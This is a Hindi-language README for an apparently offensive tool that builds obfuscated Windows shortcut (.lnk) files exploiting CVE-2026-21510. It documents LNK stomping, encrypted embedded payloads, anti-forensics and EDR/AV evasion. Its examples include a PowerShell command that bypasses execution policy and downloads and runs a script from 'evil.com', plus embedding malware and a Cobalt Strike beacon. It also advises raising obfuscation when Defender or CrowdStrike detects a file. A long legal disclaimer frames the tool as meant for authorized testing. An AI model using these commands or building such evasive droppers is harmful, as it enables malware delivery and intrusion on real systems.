
CVE-2026-21510 का शोषण करने वाली अस्पष्ट (obfuscated) .lnk फ़ाइलें उत्पन्न करता है, जिसमें LNK स्टॉम्पिंग, एन्क्रिप्टेड पेलोड, और अधिकृत पेनेट्रेशन टेस्टिंग तथा रेड टीम ऑपरेशन के लिए एंटी-फोरेंसिक्स शामिल हैं।
README EpSiLoNPoInTlnk CVE-2026-21510 - .LNK जनरेटर CVE-2026-21510 (Windows ShellLink Remote Code Execution) भेद्यता का उपयोग करके .lnk फ़ाइलें बनाने का उपकरण। आक्रामक सुरक्षा अनुसंधान, अधिकृत पैठ परीक्षण, और भेद्यता विश्लेषण के लिए डिज़ाइन किया गया।
कानूनी चेतावनी ⚠️ यह उपकरण केवल कानूनी और अधिकृत उपयोग के लिए है। सिस्टम या नेटवर्क के खिलाफ कोई भी अनधिकृत उपयोग स्थानीय और अंतर्राष्ट्रीय कानूनों का उल्लंघन करेगा (जैसे: Computer Fraud and Abuse Act (CFAA), GDPR, फ्रांस में Loi Godfrain)। लेखक किसी भी दुरुपयोग के लिए जिम्मेदारी अस्वीकार करता है। (नीचे गैर-जिम्मेदारी खंड देखें।)
विवरण यह जनरेटर CVE-2026-21510 का उपयोग करने के लिए अस्पष्ट (obfuscated) .lnk फ़ाइलें बनाता है, जो Windows शॉर्टकट प्रोसेसिंग में एक भेद्यता है। इसमें शामिल है:
LNK Stomping (5 प्रकार: dot, path_segment, relative, double_extension, unicode)
यादृच्छिक CLSID और PKEY के साथ PropertyStore
KnownFolderDataBlock (यादृच्छिक या लक्षित KnownFolderID)
EnvironmentVariableDataBlock (यूनिकोड अस्पष्टीकरण, गतिशील चर)
अस्पष्टीकरण (स्तर 1-5: TrackerDataBlock, ConsoleDataBlock, यादृच्छिक ब्लॉक)
एम्बेडेड और एन्क्रिप्टेड पेलोड (AES-256-CBC + XOR)
एंटी-फोरेंसिक्स (टाइमस्टैम्प 0 पर, फ़ाइल आकार 0 पर, न्यूनतम मेटाडेटा)
EDR/AV बाईपास (वैध प्रक्रियाएं, PowerShell में अस्पष्ट तर्क)
यादृच्छिक प्रकारों का निर्माण (हस्ताक्षर से बचने के लिए 10+ अद्वितीय प्रकार)
आवश्यक शर्तें सिस्टम OS: Windows (जनरेट किए गए .lnk का परीक्षण करने के लिए) या Linux/macOS (जनरेशन के लिए)।
Python: ≥ 3.10। निर्भरताएं: pip install pycryptodome
अनुशंसित उपकरण विश्लेषण: PEStudio, Detect It Easy (DIE)
डीबग: x64dbg, WinDbg
परीक्षण: पृथक Windows वर्चुअल मशीन (जैसे: VirtualBox पर Windows 10/11)।
स्थापना रिपॉजिटरी क्लोन करें: git clone https://github.com/EpSiLoNPoInT/EpSiLoNPoInTlnk.git cd EpSiLoNPoInTlnk निर्भरताएं स्थापित करें: pip install -r requirements.txt (वैकल्पिक) वर्चुअल वातावरण बनाएं: python -m venv venv source venv/bin/activate # Linux/macOS venv\Scripts\activate # Windows
उपयोग
बुनियादी जनरेशन python lnkstomperpoint.py --target "C:\Windows\System32\cmd.exe" --args "/c calc.exe" --output exploit.lnk calc.exe लॉन्च करने के लिए CVE-2026-21510 का उपयोग करके एक .lnk बनाता है।
उन्नत विकल्प विकल्प विवरण डिफ़ॉल्ट मान --target लक्ष्य पथ (जैसे: C:\Windows\System32\cmd.exe) C:\Windows\System32\cmd.exe --args लक्ष्य के लिए तर्क (जैसे: /c whoami) /c calc.exe --output .lnk का आउटपुट पथ ./EpSiLoNPoInTlnk_[TIMESTAMP].lnk --working-dir कार्यशील निर्देशिका C:\Windows\System32 --description शॉर्टकट का विवरण यादृच्छिक स्ट्रिंग --unc UNC पथ का उपयोग करें (?\C:...) False --lnk-stomping LNK Stomping सक्षम करें True --stomping-variant LNK Stomping प्रकार (dot, path_segment, relative, double_extension, unicode, random) random --obfuscation अनावश्यक ExtraData ब्लॉक जोड़ें True --obfuscation-level अस्पष्टीकरण स्तर (1-5) 5 --embed-payload एम्बेड करने के लिए फ़ाइल का पथ (जैसे: payload.bin) None --encrypt-payload पेलोड एन्क्रिप्ट करें (AES-256-CBC + XOR) True --anti-forensics एंटी-फोरेंसिक्स तकनीक लागू करें True --randomize-clsid PropertyStore में CLSID यादृच्छिक करें True --randomize-known-folder KnownFolderID यादृच्छिक करें True --obfuscate-arguments तर्क अस्पष्ट करें (PowerShell) True --generate-variants N यादृच्छिक प्रकार बनाएं 0 --debug उन्नत डीबग मोड (विस्तृत लॉग) False
उदाहरण
उदाहरण 1: एम्बेडेड पेलोड के साथ एक्सप्लॉइट
python lnkstomperpoint.py
--target "C:\Windows\System32\cmd.exe"
--args "/c payload.exe"
--embed-payload ./malware.bin
--output exploit_with_payload.lnk
--obfuscation-level 5
--anti-forensics
एन्क्रिप्टेड (AES-256 + XOR) और अस्पष्ट पेलोड के साथ एक .lnk बनाता है।
उदाहरण 2: 10 यादृच्छिक प्रकारों का निर्माण
python lnkstomperpoint.py
--target "C:\Windows\System32\powershell.exe"
--args "-nop -ep bypass -c IEX (New-Object Net.WebClient).DownloadString('http://evil.com/shellcode.ps1')"
--generate-variants 10
--output-dir ./variants
EDR/AV हस्ताक्षरों से बचने के लिए 10 अद्वितीय प्रकार बनाता है।
उदाहरण 3: न्यूनतम मोड (परीक्षण के लिए)
python lnkstomperpoint.py
--target "C:\Windows\System32\notepad.exe"
--obfuscation False
--anti-forensics False
--output minimal_exploit.lnk
एक गैर-अस्पष्ट .lnk बनाता है (विश्लेषण या डीबग के लिए)।
तकनीकी कार्यप्रणाली
ShellLink हेडर (0x4C निश्चित बाइट्स + ऑफसेट): LinkCLSID: 00021401-0000-0000-C000-000000000046 (अनिवार्य)। LinkFlags: HasRelativePath, HasWorkingDir, IsUnicode आदि सक्षम करने के लिए कॉन्फ़िगर किया गया।
StringData: RelativePath: लक्ष्य पथ (यदि सक्षम हो तो LNK Stomping के साथ)। WorkingDir: कार्यशील निर्देशिका (जैसे: C:\Windows\System32)। Arguments: अस्पष्ट तर्क (PowerShell, cmd, आदि)।
ExtraData ब्लॉक (महत्वपूर्ण क्रम): PropertyStoreDataBlock: PKEY_AppUserModel_ID शामिल है (यादृच्छिक CLSID)। KnownFolderDataBlock: सिस्टम फ़ोल्डर की ओर इशारा करता है (जैसे: %SystemRoot%)। EnvironmentVariableDataBlock: Mark-of-the-Web (MotW) से पहले चरों के विस्तार को बाध्य करता है। अस्पष्टीकरण ब्लॉक (obfuscation_level के अनुसार): TrackerDataBlock (स्तर 1) ConsoleDataBlock (स्तर 2) DarwinDataBlock, ShimDataBlock, आदि (स्तर 3-5)
एम्बेडेड पेलोड (यदि --embed-payload): AES-256-CBC + XOR के साथ एन्क्रिप्टेड।
पेलोड AES-256-CBC के साथ एन्क्रिप्ट किया गया है (32-बाइट यादृच्छिक कुंजी, 16-बाइट IV)।
AES कुंजी के पहले 16 बाइट्स के साथ एक XOR परत लागू की जाती है।
कुंजी और IV बाद में डिक्रिप्शन के लिए ShimDataBlock में संग्रहीत किए जाते हैं।
परीक्षण और सत्यापन
फ़ाइल का न्यूनतम आकार।
HeaderSize और CLSID की वैधता।
आवश्यक LinkFlags की उपस्थिति।
ExtraData ब्लॉकों की संरचना (PropertyStore, KnownFolder, आदि)।
निष्पादन (पृथक वातावरण में): .lnk पर डबल-क्लिक करें और व्यवहार का निरीक्षण करें। सिस्टम कॉल का विश्लेषण करने के लिए Process Monitor (ProcMon) का उपयोग करें।
EDR/AV डिटेक्शन: Windows Defender या CrowdStrike जैसे उपकरणों के साथ परीक्षण करें। यदि .lnk का पता चलता है, तो obfuscation_level बढ़ाएं या कुछ विकल्प अक्षम करें।
उपयोग के मामले परिदृश्य कमांड विवरण पैठ परीक्षण --target "C:\Windows\System32\cmd.exe" --args "/c whoami" जांचता है कि एक्सप्लॉइट लक्ष्य मशीन पर काम करता है या नहीं। Red Team --embed-payload ./cobaltstrike_beacon.bin --obfuscation-level 5 अस्पष्ट Cobalt Strike पेलोड के साथ एक .lnk बनाता है। अनुसंधान --generate-variants 50 --output-dir ./samples EDR डिटेक्शन का परीक्षण करने के लिए 50 प्रकार बनाता है। डीबग --debug --obfuscation False .lnk की संरचना का विश्लेषण करने के लिए विस्तृत लॉग प्रदर्शित करता है। योगदान योगदान का स्वागत है! योगदान करने का तरीका यहां दिया गया है:
प्रोजेक्ट को फोर्क करें।
एक ब्रांच बनाएं (git checkout -b feature/मेरी-नई-सुविधा)।
अपने परिवर्तन कमिट करें (git commit -m "सुविधा X जोड़ी गई")।
ब्रांच को पुश करें (git push origin feature/मेरी-नई-सुविधा)।
एक Pull Request खोलें। योगदान विचार:
LNK Stomping के नए प्रकार जोड़ें।
अन्य एन्क्रिप्शन एल्गोरिदम लागू करें (जैसे: ChaCha20)।
तर्क अस्पष्टीकरण में सुधार करें (जैसे: JScript का उपयोग)।
.lnk संरचनाओं को सत्यापित करने के लिए यूनिट परीक्षण जोड़ें।
लाइसेंस यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत है। अधिक विवरण के लिए LICENSE फ़ाइल देखें।
गैर-जिम्मेदारी खंड 🚨 गैर-जिम्मेदारी खंड
📜 गैर-जिम्मेदारी खंड (DISCLAIMER)
इस उपकरण का उपयोग करने से पहले ध्यान से पढ़ें।
⚠️ स्पष्ट कानूनी चेतावनी
इस उपकरण का उपयोगकर्ता (इसके बाद "उपयोगकर्ता" कहा जाएगा) निम्नलिखित शर्तों को स्वीकार करता है और स्पष्ट रूप से सहमत है:
केवल कानूनी उपयोग
यह उपकरण विशेष रूप से कानूनी और अधिकृत उपयोग के लिए है, जैसे:
शैक्षणिक या व्यावसायिक ढांचे में सुरक्षा अनुसंधान।
उन सिस्टमों पर पैठ परीक्षण (pentest) जिनके लिए उपयोगकर्ता के पास मालिक से लिखित प्राधिकरण है।
नियंत्रित वातावरण में भेद्यता विश्लेषण (जैसे: सुरक्षा प्रयोगशालाएं, CTF, अधिकृत बग bounty)।
कोई भी अन्य उपयोग सख्त वर्जित है और कई न्यायक्षेत्रों में आपराधिक अपराध हो सकता है, जिनमें शामिल हैं (लेकिन इन्हीं तक सीमित नहीं):
फ्रांस: 5 जनवरी 1988 का कानून n°88-19 (Loi Godfrain), आपराधिक संहिता के अनुच्छेद 323-1 से 323-7 (धोखाधड़ीपूर्ण पहुंच, डेटा संशोधन, आदि)।
यूरोपीय संघ: सूचना प्रणालियों के खिलाफ हमलों पर निर्देश 2013/40/EU।
संयुक्त राज्य अमेरिका: Computer Fraud and Abuse Act (CFAA), 18 U.S. Code § 1030।
अन्य देश: समकक्ष स्थानीय कानून (जैसे: यूनाइटेड किंगडम में Computer Misuse Act)।
गारंटी का अभाव
लेखक (EpSiLoNPoInT) इस उपकरण के संबंध में कोई गारंटी नहीं देता, स्पष्ट या निहित, जिसमें शामिल हैं:
इस उपकरण की विश्वसनीयता, सटीकता या उपयोगिता।
कोड में बग या भेद्यताओं की अनुपस्थिति।
सभी सिस्टम या वातावरण के साथ संगतता।
उपकरण के उपयोग से प्राप्त परिणाम।
उपयोगकर्ता इस उपकरण के उपयोग से संबंधित सभी जोखिम वहन करता है, जिनमें शामिल हैं (लेकिन इन्हीं तक सीमित नहीं):
अपने स्वयं के सिस्टम या तीसरे पक्ष के सिस्टम को हुए भौतिक या सॉफ्टवेयर क्षति।
लागू कानूनों के उल्लंघन के मामले में कानूनी परिणाम।
डेटा हानि या सेवा व्यवधान।
देयता की सीमा
किसी भी स्थिति में, लेखक, योगदानकर्ता, या इस उपकरण के निर्माण, उत्पादन या वितरण में शामिल कोई भी अन्य पक्ष इसके लिए उत्तरदायी नहीं होगा:
किसी भी प्रकार की क्षति (प्रत्यक्ष, अप्रत्यक्ष, आकस्मिक, विशेष, अनुकरणीय या परिणामी), जिनमें शामिल हैं (लेकिन इन्हीं तक सीमित नहीं):
लाभ की हानि।
डेटा हानि या फ़ाइल भ्रष्टाचार।
प्रतिष्ठा को क्षति।
उपयोगकर्ता द्वारा सामना किए गए मुकदमे या जुर्माने।
भले ही लेखक को ऐसी क्षति की संभावना के बारे में सूचित किया गया हो।
कानूनों और विनियमों का अनुपालन
उपयोगकर्ता अपने न्यायक्षेत्र में लागू सभी कानूनों, विनियमों और मानकों का पालन करने के लिए सहमत है, जिनमें शामिल हैं (लेकिन इन्हीं तक सीमित नहीं):
डेटा सुरक्षा कानून (जैसे: EU में GDPR)।
साइबर सुरक्षा और कंप्यूटर धोखाधड़ी कानून।
अपने नियोक्ता या संगठन की सुरक्षा नीतियां।
उपयोगकर्ता इन कानूनों या दायित्वों के उल्लंघन से उत्पन्न किसी भी दावे, क्षति या व्यय (कानूनी शुल्क सहित) के लिए लेखक को क्षतिपूर्ति और हानिरहित रखेगा।
दुर्भावनापूर्ण पुनर्वितरण का निषेध
उपयोगकर्ता स्पष्ट रूप से निम्नलिखित से प्रतिबंधित है:
इस उपकरण को दुर्भावनापूर्ण उद्देश्यों के लिए बेचना, किराए पर देना या पुनर्वितरित करना।
इसे साइबर अपराध हथियार (जैसे: ransomware, spyware) बनाने के लिए कोड को संशोधित करना।
स्पष्ट प्राधिकरण के बिना महत्वपूर्ण बुनियादी ढांचे (जैसे: अस्पताल, सरकारें, बैंक) को लक्षित करने के लिए इस उपकरण का उपयोग करना।
इस गैर-जिम्मेदारी खंड को संप्रेषित किए बिना इस उपकरण को तीसरे पक्ष के साथ साझा करना।
तीसरे पक्ष के लिए देयता का बहिष्करण
यह उपकरण तृतीय-पक्ष लाइब्रेरी (जैसे: pycryptodome) के साथ इंटरैक्ट कर सकता है।
लेखक इन लाइब्रेरी के कार्यों या भेद्यताओं को नियंत्रित नहीं करता और उनके लिए जिम्मेदार नहीं है।
उपयोगकर्ता को किसी भी उपयोग की गई निर्भरता के लाइसेंस और सुरक्षा को सत्यापित करना चाहिए।
अपने जोखिम पर उपयोग
इस उपकरण का उपयोग करके, आप इस खंड की शर्तों को पूरी तरह और बिना किसी आरक्षण के स्वीकार करते हैं।
यदि आप इन शर्तों से सहमत नहीं हैं, तो इस उपकरण का उपयोग न करें और अपने पास मौजूद सभी प्रतियों को तुरंत हटा दें।
क्षेत्राधिकार और लागू कानून
यह खंड फ्रांसीसी गणराज्य के कानूनों द्वारा शासित और व्याख्या किया गया है।
इस खंड या इस उपकरण के उपयोग से उत्पन्न या संबंधित किसी भी विवाद को पेरिस (फ्रांस) की अदालतों के अनन्य क्षेत्राधिकार के अधीन किया जाएगा।
🔐 सुरक्षा अनुशंसाएं
इस उपकरण के सुरक्षित और कानूनी उपयोग के लिए: ✅ परीक्षणों को हमेशा वर्चुअल वातावरण (जैसे: VirtualBox, VMware) में अलग करें। ✅ उन सिस्टमों पर परीक्षण करने से पहले लिखित प्राधिकरण प्राप्त करें जो आपके नहीं हैं। ✅ आकस्मिक लीक से बचने के लिए परीक्षण मशीनों के नेटवर्क कनेक्शन अक्षम करें। ✅ व्यवहार का विश्लेषण करने के लिए निगरानी उपकरण (जैसे: Wireshark, Process Monitor) का उपयोग करें। ✅ भेद्यताओं की जिम्मेदारी से रिपोर्ट करें (जैसे: बग bounty कार्यक्रमों के माध्यम से)। ❌ प्राधिकरण के बिना उत्पादन सिस्टम पर कभी परीक्षण न करें। ❌ जनरेट किए गए एक्सप्लॉइट को अनधिकृत व्यक्तियों के साथ साझा न करें। ❌ दुर्भावनापूर्ण पेलोड को सार्वजनिक रूप से सुलभ सिस्टम पर संग्रहीत न करें।
📞 संपर्क
इस उपकरण के बारे में किसी भी कानूनी या तकनीकी प्रश्न के लिए:
लेखक: EpSiLoNPoInT
ईमेल: [email protected]
GitHub: EpSiLoNPoInTOrI
⚠️ नोट: लेखक इस उपकरण के अवैध या अनैतिक उपयोग के लिए कोई समर्थन प्रदान नहीं करेगा।
📅 खंड की तिथि
अंतिम अद्यतन: 9 मई 2026 संस्करण: 1.0